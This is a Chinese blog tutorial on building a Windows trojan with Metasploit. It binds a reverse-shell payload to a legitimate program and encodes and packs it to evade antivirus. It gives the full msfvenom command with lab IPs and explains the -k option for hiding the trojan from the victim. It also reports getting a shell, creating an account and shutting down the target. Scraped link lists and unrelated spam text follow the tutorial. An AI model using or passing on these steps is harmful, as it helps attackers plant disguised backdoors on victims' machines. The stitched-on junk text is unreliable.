linux脚本加壳,Metasploit实现木马生成、捆绑、免杀

原创博客,转载请注出处!

我的公众号,正在建设中,欢迎关注:

Meatsploit介绍2018/01/03 更新

Metasploit是一款优秀的开源(!= 完全免费)渗透测试框架平台,在该平台下可以方便的实施渗透测试,Meatsploit具有繁多的接口、模块等等,甚至允许用户自己编写自己的模块使用。在Metasploit框架下可以方便的实现木马的生成、捆绑、免杀。实验楼网站存在此节课程但是是收费的,How frustrating,,,,so,,,,,:)

0X01选择攻击载荷

首先,开启终端,键入:“msfconsole“,进入metasploit控制台。

键入“show payloads",查看所有可用的攻击载荷的信息。下面列出的载荷信息是所有可以使用的攻击载荷

我使用的载荷名为:shell_reverse_tcp,是一个简单的反弹shell程序,功能是连接肉鸡(系统为windows系统)的命令行。当然也可以使用其它的攻击载荷,实现不同的功能。

0X02选择被捆绑文件

本实验的实现的功能之一就是让木马捆绑在一个其它的可执行文件上,以便于木马的感染和传播。其实Meatsploit自带有程序模板,其位置在data/templates/template.exe。虽然这个模板经常会更新,但是其仍是各大反病毒木马厂商的关注重点。为了更好地实现免杀,我自己选择一个待捆绑程序。我选择的程序模板是”IP雷达“,IP雷达是一款常用且优秀的系统资源监控程序。(关于被捆绑程序的选择是随机的,侵删)下图中qqwry.dat是IP雷达的IP地址库,与本实验无关。

0X03关于免杀

免杀是一门非常重要的技术(其它技术也很重要),我想一个真正的Hacker不会仅仅满足于使用别人的软件来进行免杀。自己写的壳再怎么低级也比直接从网上找到的加壳工具安全的多。常见的免杀方式有:修改特征码/修改程序入口点/花指令/加壳等等。(关于免杀推荐《黑客免杀攻防》——任晓珲,本书堪称入门/提升的经典之作,该书作者前是邪恶八进制的一员哦:))回归正题,在Meatsploit框架下免杀的方式之一就是使用MSF编码器。其功能是对我们攻击载荷文件进行重新的排列编码,改变可执行文件中的代码形状,避免被杀软认出。可以在终端键入msfvenom -l encoders来查看所有的可用的编码方式。注意并不是所有的编码方式都在windows系统上可用!!!

再次提醒:注意并不是所有的编码方式都在windows系统上可用!!!这里我选择的编码方式是:

0X04木马的生成/捆绑/免杀

实验环境:攻击机IP:192.168.159.134系统:Kali linux靶机IP:192.168.159.1系统:win7(安全软件为:360、COMODO )

生成木马/捆绑/免杀操作如下:

msfvenom -p windows/shell_reverse_tcp 意为使用shell_reverse_tcp攻击载荷LHOST=192.168.159.134此步是设置攻击者IP地址LPORT=8080此步是设置木马将会主动连接攻击者设定的监听端口-e x86/shikata_ga_nai此步意为使用shikata_ga_nai的编码方式对攻击载荷进行重新编码,上文有讲-x IPradar5.exe此步意为将木马捆绑在指定的可执行程序模版上,此处为IPradar5.exe-i 5此处意为使用刚才设定的编码方式对目标进行5次编码(多次编码理论上来讲有助于免杀,但是也不一定,毕竟杀软不是白收费的,免杀技术飞速发展,新的免杀技术一出现就会被各大安全厂商盯上的。。。。)-f exe此步意为指定MSF编码器输出格式为exe-o /root/Desktop/backdoor.exe此步意为指定处理完毕后的文件输出路径

至此木马程序生成/捆绑/免杀就都完成了,,,,,,四不四很简单。。。。赶脚完全木有技术含量的说。。。。

下面测试:先设置msf,将其设置为监听8080,等待木马的链接。。。。。。。。这就尴尬了。。。。

并不甘心。。。。再对刚才的程序进行加壳处理终端键入upx,参看upx加壳软件参数键入命令:upx -5 backdoor.exe 即对backdoor.exe进行加壳(此处为压缩处理),加壳的不便之处就是会改变源文件的大小,有经验的安全人员很容易发现这点差别。。。。重命名为1backdoor.exe重新使用360扫描结果狠尴尬。。。。360的反木马引擎看来还是不错的。。。。。将加壳后的文件上传viscan进行云查杀可见公开的免杀工具并不是那么的靠谱,而且我发现在viscan的杀毒引擎中,奇虎360的引擎版本才是1.0.1,,,可见安全公司并不是白吃干饭的额。。。。

还有一点说明一下,以上对木马的生成绑定操作,执行含有木马的宿主程序时,宿主程序并不会启动,如果想隐蔽木马文件让用户察觉不出来宿主程序有问题的话,则要在生成木马的那段代码中添加 -k 选项,此意为攻击载荷会在一个独立的进程中启动而源宿主程序的运行不受影响。

++++++++++++++++++++++++++++++++++++++我是分割线++++++++++++++++++++++++++++++++++++++++++++++++++++

2018/01/03 更新之前的实验是无线环境下进行操作,一直没能实现获取目标机的shell,现使用有线连接,成功获取了shell。截图如下:

目标机:

从上图可以看到成功在肉鸡上创建了账户,下面测试下关机命令

实验免杀还是未能绕过360安全卫士,待有时间再实验。

我的公众号,正在建设中,欢迎关注:

实验到此结束

Linux逆向之加壳&脱壳 – 问问呀[转]Linux中Shell脚本的加密与解密-沃园加壳工具推荐:Virbox Protector - Virbox - 博客园易语言使用vmp加壳保护程序_赵克立博客_技术栈关于给网页加壳问题<<<<<<<======-CSDN社区Linux 下 expect 脚本语言中交互处理常用命令 - ExplorerMan ...Metasploit实现木马生成、捆绑、免杀 - ghost00011011 - 博 …怎样对 Python 源码加密? - SegmentFault 思否OllyDBG 破解入门教程 图文_加壳脱壳_软件教程_脚本之家Android安全/应用逆向--33--使用IDA Pro进行脱壳挖矿病毒攻击的排查处置手册iOS安全逆向之旅---逆向基本知识概要介绍远控免杀从入门到实践(2)工具总结篇XCTF-攻防世界CTF平台-Reverse逆向类——31、hackme171022 逆向-Xp0intCTF(Re)2017-2018-1 20179202《Linux内核原理与分析》第十一周作业Kali Linux -- Metasploit MSFvenom Generate a Trojan horse and receive a rebound(生成木马和接收反弹...2018年云上挖矿分析报告Android逆向分析概述Node.js Electron windows下安装与打包成 exeUnity3D-重新编译Mono加密DLL如何防止Unity3D代码被反编译?[网络安全自学篇] 八十八.基于机器学习的恶意代码检测技术详解170628 逆向-安卓查壳软件ApkDetecter安装整个IT界可分为13块大领域[系统安全] 二十七.WannaCry勒索病毒分析 (3)蠕虫传播机制解析及IDA和OD逆向[网络安全自学篇] 八十七.恶意代码检测技术详解及总结[网络安全自学篇] 八十九.PE文件解析之通过Python获取时间戳判断软件来源地区[网络安全自学篇] 六十二.PE文件逆向之PE文件解析、PE编辑工具使用和PE结构修改(三)Andfix学习记录网络安全(黑客)常见术语[网络安全自学篇] 六十一.PE文件逆向之数字签名详细解析及Signcode、PEView、010Editor、Asn1View等工具...Nginx安全加固配置手册企业壳的反调试及Hook检测分析【技术分享】几维安全CTO刘柏江:IoT时代LLVM编译器防护的艺术QtIFW学习Android安全研究经验谈Metasploit用法大全
第四百七十章所要的第四百七十章狂妄的年轻男子挪威冬天夜晚多长北京至着西安香港立法会议员何君尧遇袭被人刺伤已送医看完TV版后看剧场版有什么顺序要求吗金矿开采宝洁公司创始人是谁六国论知识点归纳整理六国论重点句子翻译恶魔总裁腹暖情总裁腹黑妻39演员宣传单设计软件有哪些2022考研政治毛中特系统复习大汇总2022年考研政治毛中特红楼梦哪几回推荐cd4052是什么芯片720g月饼光威悍将720G369元上车已退货水姐妹们高度近视可以去高海拔地区吗各位姐妹请问高度近视可以跳绳吗天津河西重点小学学区房MySQLDELETE新手教程